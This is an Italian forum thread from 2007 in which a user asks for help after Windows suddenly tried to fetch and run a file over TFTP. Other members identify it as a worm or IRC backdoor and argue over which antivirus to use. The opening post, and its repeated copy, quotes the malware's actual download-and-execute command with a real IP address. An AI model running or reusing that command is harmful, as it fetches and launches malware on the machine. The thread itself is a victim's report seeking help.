Nod32 e system32/tftp.exe

atarumorobosci · 17-02-2007, 16:01

Salve ragazzi.....sottopongo ai più il quesito prima di ricorrere alle maniere forti con il mio pc (formattare

)
Lavoro tranquillamente quando all'improvviso la finestra "esegui" si attiva con la seguente istruzione: "%comspec% /c tftp -i 68.43.148.121 GET zkbagzd.exe & start zkbagzd".
Panico....successivamente si apre il prompt di ms-dos con il file cmd.exe che si avvia bloccato prontamente dall'antivirus Nod32.
Cosa sarà mai? il mio intuito mi dice che quella istruzione serva a far avviare il file zkbagzd.exe richiesto da quell'ip.
In realtà il suddetto file non esiste nel pc....forse l'antivirus lo avrà eliminato?
Nel file dei rapporti del Nod32 mi indica che ha posto in quarantena il file "tftp2448 oppure tftp3478 ecc...."che è probabilmente un virus sconosciuto ed è causato dal file tftp.exe.
quali i rimedi possibili?
grazie a quanti mi aiuteranno

N.B.:ricordo che il file tftp è un file di sistema quindi non serve cancellarlo dal pc!

wizard1993 · 17-02-2007, 17:53

complimenti per esser stato infettato da
Cycle.worm.a
scaricati kasperksy antivirus 6 in trial leva nod e fai un bel passaggio dopo l'aggiornamento

atarumorobosci · 17-02-2007, 18:01

Quote:

Originariamente inviato da wizard1993

complimenti per esser stato infettato da
Cycle.worm.a
scaricati kasperksy antivirus 6 in trial leva nod e fai un bel passaggio dopo l'aggiornamento

Ok....opero e ti faccio sapere...
Ps: cacchio allora questo Nod32 non vale una cippalippa?

wizard1993 · 17-02-2007, 18:05

Quote:

Originariamente inviato da atarumorobosci

Ok....opero e ti faccio sapere...
Ps: cacchio allora questo Nod32 non vale una cippalippa?

con i virus subdoli il kas è l'unico che compente

raffree · 17-02-2007, 18:26

Quote:

Originariamente inviato da atarumorobosci

Ok....opero e ti faccio sapere...
Ps: cacchio allora questo Nod32 non vale una cippalippa?

Il Nod32 non è una cippalippa come dici tu. Chissà cosa hai scaricato o in quale sito sei andato...
Nessun antivirus rimuove tutti i virus dobbiamo collaborare anche noi a tenere il pc protetto ad esempio evitando di andare su siti bancari,casinò,porno...
Comunque sul pc non basta solo un antivirus ma ci vuole anche un antispyware,antiadware e un firewall per proteggersi come minimo

P.S. Scusa hai il service pack 2?

atarumorobosci · 18-02-2007, 04:20

Quote:

Originariamente inviato da raffree

Il Nod32 non è una cippalippa come dici tu. Chissà cosa hai scaricato o in quale sito sei andato...
Nessun antivirus rimuove tutti i virus dobbiamo collaborare anche noi a tenere il pc protetto ad esempio evitando di andare su siti bancari,casinò,porno...
Comunque sul pc non basta solo un antivirus ma ci vuole anche un antispyware,antiadware e un firewall per proteggersi come minimo

P.S. Scusa hai il service pack 2?

Allora...ti dico....no siti porno,no siti bancari....solo portali ben noti a tutti ed email scaricate senza nulla di strano....il pc è di 1 mese circa quindi niente dubbi sulla sospetta navigazione in siti poco raccomandabili.....lo avevo destinato proprio ad una navigazione sicura.....(siti vbancari ecc....fortuna che non avevo fatto ancora nessun accesso alla mia banca!!!!!!!!!!) fornito di windows defendere, firewall del router e mi crosoft antispiware ecc....cmq il nod32 blokkava il predetto virus ad un certo punto giusto?quindi posso stare tranquillo sul fatto che il virus non completava la sua azione???solo che non lo debellava....e questo è un grave difetto dell'antivirus.....dovrò tornare ad avast????forse sì aggiungendo un banco da 1 gb di ram!!!!infatti è peggio di un vampiro di ram!!!!
cmq applico e ti faccio sapere....il pc è in remoto collegato all'ufficio....
Ps: vorrei tanto sapere qual era lo scopo di questo bast..... di worm!!!

wizard1993 · 18-02-2007, 14:05

Quote:

Originariamente inviato da atarumorobosci

Allora...ti dico....no siti porno,no siti bancari....solo portali ben noti a tutti ed email scaricate senza nulla di strano....il pc è di 1 mese circa quindi niente dubbi sulla sospetta navigazione in siti poco raccomandabili.....lo avevo destinato proprio ad una navigazione sicura.....(siti vbancari ecc....fortuna che non avevo fatto ancora nessun accesso alla mia banca!!!!!!!!!!) fornito di windows defendere, firewall del router e mi crosoft antispiware ecc....cmq il nod32 blokkava il predetto virus ad un certo punto giusto?quindi posso stare tranquillo sul fatto che il virus non completava la sua azione???solo che non lo debellava....e questo è un grave difetto dell'antivirus.....dovrò tornare ad avast????forse sì aggiungendo un banco da 1 gb di ram!!!!infatti è peggio di un vampiro di ram!!!!
cmq applico e ti faccio sapere....il pc è in remoto collegato all'ufficio....
Ps: vorrei tanto sapere qual era lo scopo di questo bast..... di worm!!!

non mi sorprende che con defender e un firewall senza controllo in uscita non te lo abbiano preso

si av free ti consiglio avs che è il fratello minore del kasperksy

raffree · 18-02-2007, 14:19

Quote:

Originariamente inviato da wizard1993

non mi sorprende che con defender e un firewall senza controllo in uscita non te lo abbiano preso

si av free ti consiglio avs che è il fratello minore del kasperksy

Io invece te lo sconsiglio active virus shield (fratello minore del kaspersky) perchè anche avendo una buona rilevazione dei virus non ha il web antivirus cosa che è IMPORTANTISSIMA

wizard1993 · 18-02-2007, 14:24

Quote:

Originariamente inviato da raffree

Io invece te lo sconsiglio active virus shield (fratello minore del kaspersky) perchè anche avendo una buona rilevazione dei virus non ha il web antivirus cosa che è IMPORTANTISSIMA

e trovamene uno free e potente che ce l'abbia

raffree · 18-02-2007, 14:32

Quote:

Originariamente inviato da wizard1993

e trovamene uno free e potente che ce l'abbia

Non sono buoni gli antivirus a pagamento figuriamoci quelli free

Comunque ogni antivirus free ha qualche problema altrimenti non sarebbero gratuiti.

wizard1993 · 18-02-2007, 14:38

Quote:

Originariamente inviato da raffree

Non sono buoni gli antivirus a pagamento figuriamoci quelli free

Comunque ogni antivirus free ha qualche problema altrimenti non sarebbero gratuiti.

avast è l'unico che ha lo scanner web; ma personalmente tanto vale resti al nod32; almeno ha la leggerezza e l'euristica;

FabioS79 · 18-02-2007, 14:48

Io con nod32 mi trovo benissimo e giro anche sui siti poco raccomandabili che dite voi.
L'importante è affiancarci un ottimo firewall (io uso zonealarm) e un ottimo antispyware, il vecchio ewido ora avg antispyware è veramente efficace.
Mai avuto nessun problema di troian ecc... cmq controllare ogni tanto anche con adaware e spyboat non fa mai male.... ricordatevi sempre anche di controllare cosa avvia il sistema automaticamente.

lord2 · 18-02-2007, 15:07

Quote:

Originariamente inviato da atarumorobosci

Allora...ti dico....no siti porno,no siti bancari....solo portali ben noti a tutti ed email scaricate senza nulla di strano....il pc è di 1 mese circa quindi niente dubbi sulla sospetta navigazione in siti poco raccomandabili.....lo avevo destinato proprio ad una navigazione sicura.....(siti vbancari ecc....fortuna che non avevo fatto ancora nessun accesso alla mia banca!!!!!!!!!!) fornito di windows defendere, firewall del router e mi crosoft antispiware ecc....cmq il nod32 blokkava il predetto virus ad un certo punto giusto?quindi posso stare tranquillo sul fatto che il virus non completava la sua azione???solo che non lo debellava....e questo è un grave difetto dell'antivirus.....dovrò tornare ad avast????forse sì aggiungendo un banco da 1 gb di ram!!!!infatti è peggio di un vampiro di ram!!!!
cmq applico e ti faccio sapere....il pc è in remoto collegato all'ufficio....
Ps: vorrei tanto sapere qual era lo scopo di questo bast..... di worm!!!

guarda anch io uso nod32 da qualche mese su un portatile certo che paragonare nod32 a avast mi sembra una bestemmia,comunque nod3 come ogni antivirus è strutturato in maniera che l utente possa configurarlo alle proprie esigenze quindi esistono le opzioni.Se nod32 ti ha trovato un operazione sospetta e te la messa in quarantena vuol dire che nelle opzioni sul da farsi è spuntato così se volevi eliminarlo direttamente potevi spuntare diversamente l opzione però non avresti potuto esaminarlo al meglio o al limite spedirlo ai laboratori nod32 per studiarlo fidati non paragonare più nod32 a avast che è una bestemmia..volevo specificare come ultima cosa che nod32 svetta nelle alte classifiche dei antivirus più sofisticati mentre avast è non il penultimo ma l ultimo in tutte le classifiche degne di questa nomea

lord2 · 18-02-2007, 15:19

e comunque più che un vero virus si tratti di una vera e propria Backdoor:IRC/SdBot.dam Backdoor=porta aperta per chi vuole entrare nel tuo pc a tua insaputa e rubarti dati protetti come giustamente hai il timore dati bancari etc etc quindi nod32 ha fatto più del suo compito per il quale è stato creato

FabioS79 · 18-02-2007, 15:55

Quote:

Originariamente inviato da lord2

e comunque più che un vero virus si tratti di una vera e propria Backdoor:IRC/SdBot.dam Backdoor=porta aperta per chi vuole entrare nel tuo pc a tua insaputa e rubarti dati protetti come giustamente hai il timore dati bancari etc etc quindi nod32 ha fatto più del suo compito per il quale è stato creato

sono daccrto con te cmq fidatevi i sistemi bancari sono molto sicuri di solito è l'utente a fare danno abboccando al fishing.
Cmq acquista avg antispyware e vedi che poi non avrai più problemi con trojan, li blocca tutti in tempo reale.

atarumorobosci · 18-02-2007, 18:43

Quote:

Originariamente inviato da FabioS79

sono daccrto con te cmq fidatevi i sistemi bancari sono molto sicuri di solito è l'utente a fare danno abboccando al fishing.
Cmq acquista avg antispyware e vedi che poi non avrai più problemi con trojan, li blocca tutti in tempo reale.

il risultato è lo stesso!!!!il file viene individuato cancellato ma non disinfettato!in sostanza al riavvio del pc sono punto e a capo....quindi nod32=avast=kasper.....ahimè domani formatto tutto....

FabioS79 · 18-02-2007, 19:06

Quote:

Originariamente inviato da atarumorobosci

il risultato è lo stesso!!!!il file viene individuato cancellato ma non disinfettato!in sostanza al riavvio del pc sono punto e a capo....quindi nod32=avast=kasper.....ahimè domani formatto tutto....

devi controllare le voci di startup.
fai anche una scansione con hjiack

lord2 · 18-02-2007, 20:43

Quote:

Originariamente inviato da atarumorobosci

il risultato è lo stesso!!!!il file viene individuato cancellato ma non disinfettato!in sostanza al riavvio del pc sono punto e a capo....quindi nod32=avast=kasper.....ahimè domani formatto tutto....

hai disattivato il restore system?magari questa fogna si è assimilato un file di sistema per questo non te lo fa modificare perchè indispensabile al sistema

atarumorobosci · 19-02-2007, 11:54

Quote:

Originariamente inviato da lord2

hai disattivato il restore system?magari questa fogna si è assimilato un file di sistema per questo non te lo fa modificare perchè indispensabile al sistema

scusate ma il file c/windows/system32/tftp.exe è un file di sistema o non serve ad una mazza?controllate nei vostri pc!

17-02-2007, 16:01	#1
atarumorobosci Senior Member Iscritto dal: Jun 2001 Città: Puglia - Bari - Messaggi: 339	Nod32 e system32/tftp.exe Salve ragazzi.....sottopongo ai più il quesito prima di ricorrere alle maniere forti con il mio pc (formattare ) Lavoro tranquillamente quando all'improvviso la finestra "esegui" si attiva con la seguente istruzione: "%comspec% /c tftp -i 68.43.148.121 GET zkbagzd.exe & start zkbagzd". Panico....successivamente si apre il prompt di ms-dos con il file cmd.exe che si avvia bloccato prontamente dall'antivirus Nod32. Cosa sarà mai? il mio intuito mi dice che quella istruzione serva a far avviare il file zkbagzd.exe richiesto da quell'ip. In realtà il suddetto file non esiste nel pc....forse l'antivirus lo avrà eliminato? Nel file dei rapporti del Nod32 mi indica che ha posto in quarantena il file "tftp2448 oppure tftp3478 ecc...."che è probabilmente un virus sconosciuto ed è causato dal file tftp.exe. quali i rimedi possibili? grazie a quanti mi aiuteranno N.B.:ricordo che il file tftp è un file di sistema quindi non serve cancellarlo dal pc! __________________ NAS KRAUN 304S THREAD UFFICIALE Ultima modifica di atarumorobosci : 17-02-2007 alle 17:09.

17-02-2007, 17:53	#2
wizard1993 Senior Member Iscritto dal: Apr 2006 Messaggi: 22462	complimenti per esser stato infettato da Cycle.worm.a scaricati kasperksy antivirus 6 in trial leva nod e fai un bel passaggio dopo l'aggiornamento __________________ amd a64x2 4400+ sk939;asus a8n-sli; 2x1gb ddr400; x850 crossfire; 2 x western digital abys 320gb\|\| asus g1 Se striscia fulmina, se svolazza l'ammazza

18-02-2007, 14:48	#12
FabioS79 Senior Member Iscritto dal: Feb 2007 Città: Sassari Messaggi: 1364	Io con nod32 mi trovo benissimo e giro anche sui siti poco raccomandabili che dite voi. L'importante è affiancarci un ottimo firewall (io uso zonealarm) e un ottimo antispyware, il vecchio ewido ora avg antispyware è veramente efficace. Mai avuto nessun problema di troian ecc... cmq controllare ogni tanto anche con adaware e spyboat non fa mai male.... ricordatevi sempre anche di controllare cosa avvia il sistema automaticamente.

18-02-2007, 15:19	#14
lord2 Senior Member Iscritto dal: May 2002 Messaggi: 3126	e comunque più che un vero virus si tratti di una vera e propria Backdoor:IRC/SdBot.dam Backdoor=porta aperta per chi vuole entrare nel tuo pc a tua insaputa e rubarti dati protetti come giustamente hai il timore dati bancari etc etc quindi nod32 ha fatto più del suo compito per il quale è stato creato

Strumenti
Mostra una versione stampabile Invia questa pagina per email